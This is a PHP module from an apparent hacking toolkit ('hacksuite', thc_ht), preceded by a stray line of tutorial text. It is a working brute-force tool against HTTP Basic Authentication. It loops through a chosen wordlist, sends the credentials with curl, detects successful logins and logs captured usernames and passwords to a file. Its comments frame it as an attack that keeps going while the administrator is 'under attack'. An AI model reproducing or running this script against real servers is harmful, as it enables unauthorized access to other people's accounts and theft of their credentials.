..show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you..
<?php
/*
Handler for HTTP Auth
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
$_MODULE_C = "thc_ht";
$_LOG = "accounts.php";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
include_once($_PATHS['functions_root']."/fwrite.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['submit']) && $_POST['submit']!="Dump Log" && $_POST['submit']!="Clean Log"){
// don't you just hate using post variables directly? Uhm I do.. ;)
$sUser = ($_POST['sUser']=="" ? "admin" : "");
$sScanUrl = $_POST['sScanUrl'];
$sWordlist = $_POST['sWordlist'];
if($_POST['submit']=="Test"){
$sScanUrl = str_replace("/thc_ht","",$_PATHS['servers_root_http']."/http_authenticate.php");
}
// first of all let's see if the url looks valid..
$aUrl = parse_url($sScanUrl);
if(!isset($aUrl['host']) || !strlen($aUrl['host'])){
die(Screen($sOut."Invalid target specified.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if($sWordlist!=""){
$sFile = ExploitFilter($_PATHS['wordlists_root']."/".$sWordlist,0,1);
if(!file_exists($sFile) || !@filesize($sFile)){
die(Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
}
else{
die(Screen($sOut."Select a wordlist you want to use.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$aWordlist = file($sFile);
$iLoops = count($aWordlist);
}
if(isset($_POST['submit'])){
// made this switch for extra future options
switch($_POST['submit']){
// this will test this script against the test server (TestServer/http_authenticate.php)
case"Test":
$_POST['submit'] = "Bruteforce";
// start task enter
case"Bruteforce":
include_once($_PATHS['includes_root']."/task_start.php");
echo $sOut;
break;
// Dump Log
case"Dump Log":
echo $sOut;
if(!function_exists("RawToArray")){
include_once($_PATHS['functions_root']."/raw_to_array.php");
}
if(false==($aKeys = RawToArray($_LOG))){
echo"<b id=h7>[no passwords found yet]</b>";
}
else{
for($x=0;$x<count($aKeys);$x++){
echo"<b>[".$aKeys[$x][0]."]</b> (".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][1]).") => (u)".$aKeys[$x][2]." (p) ".$aKeys[$x][3]."<br>\n";
}
}
exit;
break;
// Clean Log
case"Clean Log":
echo $sOut;
echo (WriteF($_LOG,"","w") ? "Successfully cleaned log" : "Failed to clean log");
echo $sEnd;
exit;
break;
// just show index
default:
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
// okidoki let's prepare the task
echo Screen("<br>\n<b>Running thc_ht @ ".$aUrl['scheme']."://".$aUrl['host'].@$aUrl['path']."</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
// keep track of status
$bFound = false;
$iPadding = strlen($iLoops);
$y = 1;
$sRequest = "";
// let's get this thing in action
for($x=0,$y=1;$x<$iLoops;$x++,$y++){
// make a connection and get the response
$ch = curl_init();
$aWordlist[$x] = trim($aWordlist[$x]);
$sRequest = $sUser.":".$aWordlist[$x];
curl_setopt($ch, CURLOPT_URL, $sScanUrl);
curl_setopt($ch, CURLOPT_USERPWD, $sRequest);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch, CURLOPT_HEADER,1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$sResponse = curl_exec($ch);
curl_close($ch);
// connection closed.. let's see what we have here..
if(preg_match('/404 Not Found/',$sResponse)){
// page doesn't exist, it's in the loop just in case the admin takes the page down if he finds out he's under attack
echo Screen("<br />\nTarget file doesn't exist!<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
break;
}
// for markup's sake so the output will look better
$iYLen = $iPadding-strlen($y);
$sAttempt = ($iYLen!=0 ? str_repeat("0",$iYLen) : "").$y;
echo Screen("[".$sAttempt."] trying ".$sRequest." => ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
if(!preg_match('/200 OK/',$sResponse)){
// no access
echo Screen("unauthorized<br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
}
else{
// bingo
echo Screen("<b>logged in</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
$bFound = true;
if($_CONTEXT['log']==true){
WriteF($_LOG,trim($sScanUrl)."|".time()."|".$sUser."|".$aWordlist[$x]."\n");
}
break;
}
flush();
ob_flush();
}
echo Screen("<p><b>attempts:</b> ".$y." => ".($bFound==true ? $sRequest : "no success")." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo $sEnd;
?>